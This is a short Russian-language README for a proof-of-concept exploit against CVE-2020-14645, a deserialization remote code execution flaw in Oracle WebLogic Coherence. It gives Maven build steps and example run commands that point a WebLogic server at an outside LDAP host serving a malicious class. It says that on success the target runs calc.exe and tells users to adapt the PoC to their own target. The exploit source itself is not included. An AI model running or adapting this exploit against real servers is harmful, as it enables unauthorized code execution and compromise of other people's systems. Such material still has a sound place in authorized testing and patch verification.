Java PoC для десериализационной RCE в WebLogic CVE-2020-14645 Coherence. Размещает вредоносный класс через LDAP и вызывает удалённое выполнение кода на уязвимых серверах WebLogic.
Maven 3
JDK 1.8
mvn package
Конкретные шаги тестирования:
Поскольку эта уязвимость похожа на уязвимость Apache Dubbo, пожалуйста, обратитесь к этой уязвимости для реализации шагов 1-4.
java -jar target/CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL
# Пример
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp http://127.0.0.1:7001
java -jar target/CVE-2020-14645.jar 1.1.1.1:8080/#exp https://127.0.0.1:7002
Если использовать POC, предоставленный в этом примере, после успешной эксплуатации тестируемая цель выполнит calc.exe. Пожалуйста, самостоятельно измените POC в соответствии с окружением тестируемой цели.
Этот проект ссылается и использует часть кода проектов @Y4er @5up3rc, выражаем особую благодарность!